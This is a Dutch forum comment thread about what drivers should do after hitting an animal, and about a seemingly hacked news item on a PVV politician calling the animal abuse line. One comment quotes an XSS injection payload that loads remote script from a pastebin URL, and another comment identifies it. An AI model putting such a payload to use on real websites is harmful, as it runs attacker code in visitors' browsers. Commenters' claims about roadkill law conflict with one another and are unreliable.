jaheur | 07-01-12 | 17:45

@Van Dikhout | 07-01-12 | 17:40 |

Rekt het niet dan scheurt het wel. Eventueel kun je er ter voorbereiding eens flink op tuffen voor wat meer souplesse.

Parel van het Zuiden | 07-01-12 | 17:45

En nog een derde: ik vond een keer een geramde egel die het nog deed op weg naar de disco. Dat deed het goed voor de aandacht... Binnen 5 minuten was ik weer op weg naar de egelopvang en daar nog wat munten gegeven voor het onderdak van het beest. Daar was geen caviapolitie voor nodig.
Ergo: egel blij, egelopvang blij, politie kon doorgaan met flitsen, en ik ook blij.

A.Th. | 07-01-12 | 17:45

@jaheur | 07-01-12 | 17:41
Die is in de hemol.

Van Dikhout | 07-01-12 | 17:43

@harryvlugopdekut | 07-01-12 | 17:27 |
Ja dat klopt, je moet het wel melden en dan hoor je vanzelf of ze komen kijken of niet. Overigens, in de randstad weet geen agent dat het aangereden wild van jou is, en ben je het kwijt voor je het weet...

KlopKlop | 07-01-12 | 17:42

@Aktivist | 07-01-12 | 17:23
Zo behulpzaam ben ik ook een keer geweest met een geitenlam.Maar dat werd me door de betrokken toerist niet in dank af genomen.Een keurige dame die zoveel scheldwoorden in de mond nam.Man man

miko | 07-01-12 | 17:42

Er zijn toch echt verschillen te noemen bij het doodrijden van dieren. Je kunt meestal een egel kapotplat rijden zonder al teveel problemen voor jezelf, probeer dat eens met een paard of een koe en je gaat, in het geval je het fysiek nog kunt, waarschijnlijk toch 112 bellen, of in ieder geval blij zijn als iemand anders dat doet.

smdyasc | 07-01-12 | 17:42

En wat is dit precies? ');o=document;x=o.createElement('script');x.src=unescape('http%253A%252F%252Fpastebin.com%252Fraw.php%253Fi%253DAaiMvz4m');o.head.appendChild(x)//--

Nieuwe manier van reaguurders afluisteren? Naast die groene pixel?

j0shua | 07-01-12 | 17:42

@vandikhout:
ff je schoonmoeder bellen misschien die van haar wel. Kun je ruilen.

jaheur | 07-01-12 | 17:41

@sjaakdeslinksesul | 07-01-12 | 17:38 |

Weleens een hert aangereden? Lekker stukje vlees maar de staat van je auto na zo'n kusje laat een bittere smaak na.

Parel van het Zuiden | 07-01-12 | 17:41

Tommygunner | 07-01-12 | 17:34 | + 0 -
Ben ook benieuwd wie dit heeft gedaan. Het is wel erg voor de hand liggend geschreven. Ik denk dat JQ beter zijn best had gedaan.

Superior Bastard | 07-01-12 | 17:40

@pius | 07-01-12 | 17:15
Dat je dat dier aanrijdt is inderdaad kudT.Vraag twee, tja als je graag minkudos ontvangt is dat normaal?

miko | 07-01-12 | 17:40

De poes van mijn vrouw doet het niet meer. En nu?

Van Dikhout | 07-01-12 | 17:40

@KlopKlop | 07-01-12 | 17:15 | + 4 - Het is ook strafbaar om een eigen dier te mishandelen. Aanrijden valt hier ook onder. Het is waar dat je niet aansprakelijk gesteld kan worden, je pleegt immers geen onrechtmatige daad jegens iemand. Dus geen verplichting tot schadevergoeding, wel mogelijk strafrechtelijke aansprakelijkheid. Je hoeft het dier niet in te leveren bij de gemeente. Als je de dood van het dier toch nog enige betekenis wil geven, zou je er inderdaad voor kunnen kiezen het op te eten.

JaNeeTochNietDan? | 07-01-12 | 17:39

@A.Th. | 07-01-12 | 17:36
Zo heb ik al twee van die Henkies van carglass kwijt gemaakt. Een prima kerst was dat.

Jackanders | 07-01-12 | 17:39

KlopKlop | 07-01-12 | 17:15
Nee dat klopt niet. Je mag dieren die je zelf aanrijdt niet meenemen. Maar dieren die een ander heeft aangereden weer wel. Kwestie van de fiets meenemen in de achterbak als je samen met iemand anders langs het hertenkamp rijdt.

sjaakdeslinksesul | 07-01-12 | 17:38

@KlopKlop | 07-01-12 | 17:15
Probeer maar eens buiten jachtzeizoen met een ree rond te rijden.Voor zoverik weet gaat die vlieger niet op.Ik dacht dat je een aangereden dier gewoon bioj de veld of gewone politie in moest leveren en die kiken wat ermee gebeurt.Ik kende mensen die zo konijnen probeerde te vangen.In de vroege avond of zonsopgang landweggetjes afstruinen.Dat zou dan legaal zijn?Ik vind dat gewoon stropen.

miko | 07-01-12 | 17:38

Tommygunner | 07-01-12 | 17:34

Kill the hoax!

pius | 07-01-12 | 17:37

Ik heb er 2:
1 is van 25 jaar geleden, dat ik op de fiets zat en een moedereend haar koters zag helpen oversteken zoals een mensenvrouw dat zou doen. Ik ben gestopt voor mevrouw de eend om haar rustig haar gang te laten gaan.
2 is nog ouder, van een maat die met open raam over de dijk reed en er 3 fazanten naar binnen kwamen. Die waren 's avonds een welkome maaltijd.
Conclusie is dat je geen jachtvergunning nodig hebt, alleen een rijbewijs, en wat je op je voorruit vind mag je opeten.

A.Th. | 07-01-12 | 17:36

@Bulloch | 07-01-12 | 17:31 | + -1 - Weer eentje die niet zelfstandig kan nadenken. Waar is je Zwitsal?

JaNeeTochNietDan? | 07-01-12 | 17:35

@Superior Bastard | 07-01-12 | 17:29
Omdat er Jorn onder staat. Ik ben benieuwd of John dit gedaan heeft. Hoe dan ook dient een hoax doorgeprikt te worden...

Tommygunner | 07-01-12 | 17:34

En Kwit, heb je oplossing van het zoekplaatje al?

eerstneukendanpraten | 07-01-12 | 17:34

Stoer hoor, dierlijk lijden niet erg vinden. Maar zuip je maar klem en rij je de hel in.

deoudererijperevrouw | 07-01-12 | 17:33

Anyway, irrelevant stuk, kom sinds je bijdrage van
05-01-12 | 13:15 | Link | 892 reacties |
toch niet meer buiten, Quid

cucaracha | 07-01-12 | 17:33

Tja... Een egel plat rijden of een konijn das domme pech hebben. Een hert aanrijden dat is andere koek. Want meer bloed en gore enzo. Vind het dan wel wijs om even te bellen ja.

jaheur | 07-01-12 | 17:32

Kostelijk, die De Roon. Ik ben blij dat we dit soort mensen 100k per jaar betalen, dan kunnen we er af en toe weer flink mee lachen :').

Bulloch | 07-01-12 | 17:31

Gaat het eens een keer over dieren, heeft Bakito weer een ban!

eerstneukendanpraten | 07-01-12 | 17:31

brutus68 | 07-01-12 | 17:28 | + 0 -
Laat maar. Ik zie het al.

Superior Bastard | 07-01-12 | 17:31

JaNeeTochNietDan? | 07-01-12 | 17:27

Je hoeft niet links te zijn om te begrijpen dat dit niets uitmaakt voor de beeldvorming.


pius | 07-01-12 | 17:30

brutus68 | 07-01-12 | 17:28 | + 0 -
Hoe dan?

Superior Bastard | 07-01-12 | 17:29

Dat is feitelijk gewoon het dierennummertje van Dion Graus. In werkelijkheid probeerde de Roon dus gewoon Dion Graus te bellen, om blijkbaar wat politiek overleg te hebben.

Nou ja kan gebeuren..

Schout-bij-nacht | 07-01-12 | 17:29

@SuperRogier | 07-01-12 | 17:21
Die realiteit is te hard voor de dierenknuffelaars.

rara | 07-01-12 | 17:29

@Tommygunner | 07-01-12 | 17:22

Je kan het ook aan nog iets anders zien...

brutus68 | 07-01-12 | 17:28

DANNY3960 | 07-01-12 | 17:26

Levensgevaarlijk.

pius | 07-01-12 | 17:27

@stommehond | 07-01-12 | 17:16 | + -1 -
Voor de linkschmenschen die dit nieuwsbericht dus maar al te graag geloven: PVV-er Raymond de Roon heeft dus NIET, ik herhaal: NIET het alarmnummer dierenmisbruik (144) gebeld. Het bericht op de Spits website is het gevolg van bedroevend slecht programmeerwerk van deze ANP doorzetfabriek.
Het enige dat hiermee is aangetoond is de goedgelovigheid van linkse rakkers, het enige dat ik hen kan aanraden is om maar zo veel mogelijk scripties in te leveren op de Katholieke Universiteit Tilburg (KUT).

JaNeeTochNietDan? | 07-01-12 | 17:27

Volgens mij heeft Johnny vanmiddag verloren bij het basketballen.
Wat een agressief stukje tekst.

de Bree | 07-01-12 | 17:27

@klopklop, dit is ook nog eens waar mits dat je er voor zorgt dat je het niet meeneemt zonder de politie er van op de hoogte te brengen, anders valt het namelijk onder stropen.
Er moet dus wel degelijk een melding gedaan worden en het aangereden wild mag pas worden meegenomen na controle door een bevoegde instantie.
Ontweiden ter plekke is ook geen goed plan

harryvlugopdekut | 07-01-12 | 17:27

Jammer dat t niet echt gebeurd is want dat was wel weer knap geweest van Raymond "In dubbele tong"....

verhaard | 07-01-12 | 17:27

Aktivist | 07-01-12 | 17:23

Ja. Onnodig lijden is nog erger inderdaad. Eens.

pius | 07-01-12 | 17:26

pius | 07-01-12 | 17:15 | + 4 -

Zeker, vooral wanneer het een everzwijn is die tot halverwege de motorkap vastzit.

DANNY3960 | 07-01-12 | 17:26

Een dier aanrijden, dan is het menselijk om te stoppen en te kijken wat je kunt doen. En ja dan bel je de dierenambulance. Of de smeris. Hangt wel een beetje van het soort dier af, en hoe gewond het beestje is. Overigens wist ik niet dat je 112 kon bellen voor een dier.

Santac | 07-01-12 | 17:26

Tommygunner | 07-01-12 | 17:22 | + 0 -
Een pixel?

Superior Bastard | 07-01-12 | 17:25

@stommehond | 07-01-12 | 17:16 | + -1 -
OMG, er zijn serieus mensen die NIET doorhebben dat de link naar Spits! een XSS (Cross Site Scripting) exploit bevat, die content van Pastebin.com plaatst op de (slecht beveiligde) Spits website? Naja, goedgelovigheid is de linkschmensch eigen! Oh GeenStijl, why u so smart? :)

JaNeeTochNietDan? | 07-01-12 | 17:24

Jackanders | 07-01-12 | 17:21

Gelukkig. Begon al te twijfelen aan mezelf;)

pius | 07-01-12 | 17:24

Akkefietje | 07-01-12 | 17:21
Dat was een taart in 'die' raadsel.

Teun van het Tuinpad | 07-01-12 | 17:23

pius | 07-01-12 | 17:15 |
Nee ik baal ook als ik een dier aanrij. Is gelukkig pas 1 keer gebeurd. Maar toen ben ik welzeker erbij gebleven en heeft een boer uit een aangrenzende boerderij het beest (kat) uit z'n lijden verlost met een welgemikte mep met een schop. Beter dat dan 112/144 bellen en eindeloos wachten - áls de hulpdiensten zich al verwaardigen om te komen kijken naar het dier...

Aktivist | 07-01-12 | 17:23

Ik bel meestal de GGD nadat ik per ongeluk wat heb aangereden.

#wachten op SOA ipv. BOA doet

cucaracha | 07-01-12 | 17:23

Is dat trouwens toegestaan met een dooie bunzing op je kop lopen?

Of is daar geen wet voor.

pius | 07-01-12 | 17:23

Heeft sjonnie nou spitsnieuws gehackt? Vlegel!

aardappelninja | 07-01-12 | 17:22

Misschien wilde die Raymond gewoon bijkletsen met Dion?

verhaard | 07-01-12 | 17:22

LOL nu zie ik het, in dat stuk van Spitsnieuws over van Roon staat een extra sterretje plus een lap tekst met o.a. pastebin.com erin. Buma zou zeggen: gehacked...

Tommygunner | 07-01-12 | 17:22

@pius | 07-01-12 | 17:15
Neen, volkomen sane.

Jackanders | 07-01-12 | 17:21

Ik bel straks 112 voor die fijne raadsel van je Quid, van dat wijf bij die fifties oven! Daar ligt ook een dood dier in.

Akkefietje | 07-01-12 | 17:21

Volgens mij is er een directe correlatie tussen het schrijftalent van Quid en het interessantheidsgehalte van het onderwerp.
Hoe beter hij schrijft des te minder doet het onderwerp er toe. En andersom.
Dus blijf vooral verhalen over nietszeggende onzin Quid want dan kan ik genieten van je af en toe briljante schrijfsels.
*weer een schone broek aan trekt*

Herr Vorragend | 07-01-12 | 17:21

Waar ik mij aan kan ergeren zijn automobilisten die vol in de remmen gaan en wild naar links/rechts sturen om een duif te redden.. Verkeersveiligheid/mensenlevens gaat toch voor een duif/dierenleven.

SuperRogier | 07-01-12 | 17:21

Hik!

eerstneukendanpraten | 07-01-12 | 17:20

Jos The Boss had 112 moeten bellen dus.

Teun van het Tuinpad | 07-01-12 | 17:20

Gewoon plankgas en dan vervolgens ter plekke villen in de berm en dan thuis lekker oppeuzelen, dienen die beesten toch nog ergens voor.
Anders lopen ze toch alleen maar wat rond te lopen en te schijten.

inktpot | 07-01-12 | 17:19

Altijd wat met die PVV-ers @update.., als ze niet naakt over straat lopen, bellen ze wel in bezopen toestand 144...

brutus68 | 07-01-12 | 17:19

miko | 07-01-12 | 17:13 | + 0 -
Nee, vandaar ook mijn voorbehoud.

Superior Bastard | 07-01-12 | 17:18

Het laatste dier dat ik heb doodgereden, konijn, hebben we heerlijk opgegeten, hij was nog behoorlijk intact, dus waarom zou je hem dan laten liggen?

Per-Ongeluk | 07-01-12 | 17:17

Dion heeft zelf een dood dier op zijn kop. Hij praktizeert wat hij predikt dus.

En dat is lofwaardig.

pius | 07-01-12 | 17:17

@update
Dat mensen deze partij serieus kunnen nemen, dit soort incidenten is bijna elke week bij partijleden van de pvv.

stommehond | 07-01-12 | 17:16

Ik heb laatst een meerkoet gered, schaam ik me niet voor.

James St John Smythe | 07-01-12 | 17:16

Wat vele niet weten, is dat het door jou aangreden dier, van jou is.. Wilde dieren zijn namelijk van niemand. Niet van de pliesie, niet van een boa. De FenF wet heeft hierin voorzien, omdat dieren van niemand zijn, valt er ook niemand aansprakelijk te stellen voor de geleden schade. Vandaar dat aangereden wild vervalt aan diegene die het heeft aangereden, als een vorm van schade vergoeding. Uiteraard probeert de overheid hier niet teveel gerucht aan te geven, en zal een politieagent of boa natuurlijk proberen om te beweren dat het niet zo is.. Laat je niks wijsmaken. Bambi aangereden, betekend Bambi op het buffet! bij jou en niet bij de Boa, of in de personeels pot van de wouten (Nadat zij het dier hebben verpatst bij de lokale poulier..)

KlopKlop | 07-01-12 | 17:15

Toch kudt als je een dier aanrijd. Of ben ik nou gek.

pius | 07-01-12 | 17:15

Volgens mij hebben wij allen geleerd door te rijden als een dier onverwacht de weg opduikt, omwille van de verkeersveiligheid.
Waarom dan bellen?
We mogen ook niet zo maar stoppen op iedere weg, dan heb je ineens een eenstreeper in je nek met een bonnenboekje.

Als ik rem voor een dier is het puur uit eigenbelang, aangezien ik geen schade aan m'n auto wil of het verkeer in gevaar wil brengen. Konijnen of kleiner spul rem ik niet voor. Gewoon rustig rijden als je weet dat er herten/zwijnen zitten en voor de rest doorrijden.

SuperRogier | 07-01-12 | 17:14

@Superior Bastard | 07-01-12 | 17:06
Terug is van koffie pakken.
Geloof je dat? Lijkt me heel sterk.

miko | 07-01-12 | 17:13

@update

Iedere dag dronken is ook een geregeld leven en het is vast bier van Nedelandse bodem!

*echte Wiedergutmachungswarsteiners in koelkast staan heeft*

eerstneukendanpraten | 07-01-12 | 17:12

"Mensen blijken niet of nauwelijks te weten wat ze moeten doen na een aanrijding met een dier, heeft Harry Voss van de Partij voor de Dieren in Apeldoorn gemerkt."

Harry Voss. HAHAHAHAHAHAHAHA!

De Badtegelzetter | 07-01-12 | 17:12

Update-link leidt naar...?

Jos Tiebent | 07-01-12 | 17:11

Net terug van boodschappen en nog een schildpad en een haas aan mijn grill hangen.Tja racen op de openbare weg.Daar komen ongelukken van.

miko | 07-01-12 | 17:10

Ja sta heb je net dat nr van dion onder je voorkeuzetoets geïnstalleerd....

verhaard | 07-01-12 | 17:09

Als deze huidige crisis doorzet, voorzie ik dat de Libelle en de Allerhande leuke recepten gaat geven voor roadkill.
"Snijd voorzichtig de geplette kop van de romp"

King of the Oneliner | 07-01-12 | 17:09

Als het in je handen past of niet is op te eten doorrijden.

De Badtegelzetter | 07-01-12 | 17:08

Laat ik nou het nummer van David de Kabouter onder mijn sneltoetsen hebben staan voor dierenleedsituaties...

ZKH EénOog | 07-01-12 | 17:03

Altijd maar dat verongelijkte als er een dier dood gaat, lekker belangrijk, miljoenen dieren sterven per jaar in de bioindustrie maar dan is een plat egeltje ineens zielig.

BlackDeathMetal | 07-01-12 | 17:03

REAGEER OOK

bespaartips: Energie vergelijken | Autoverzekering vergelijken | Zorgverzekering vergelijken